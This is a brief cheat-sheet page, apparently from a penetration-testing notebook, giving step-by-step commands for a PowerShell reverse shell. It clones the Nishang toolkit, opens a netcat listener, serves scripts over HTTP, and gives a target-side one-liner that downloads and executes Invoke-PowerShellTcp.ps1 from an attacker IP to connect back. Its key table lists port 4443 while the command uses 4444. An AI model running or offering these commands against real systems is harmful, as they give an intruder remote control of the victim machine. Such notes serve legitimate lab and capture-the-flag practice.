Skip to content

Powershell - Revers Shell

Source of ps1 scripts

  • sudo git clone https://github.com/samratashok/nishang /opt/nishang

On hacker machine

listener

nc -nvlp 4444

static web server (expose /opt/nishang/Shells)

python3 -m http.server

On target machine

powershell iex (New-Object Net.WebClient).DownloadString('http://10.18.9.175:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.18.9.175 -Port 4444
Key Description
http://10.18.9.175:8000/ server that deliver script
-IPAddress 10.18.9.175 local/hacker machine
-Port 4443 local/hacker machine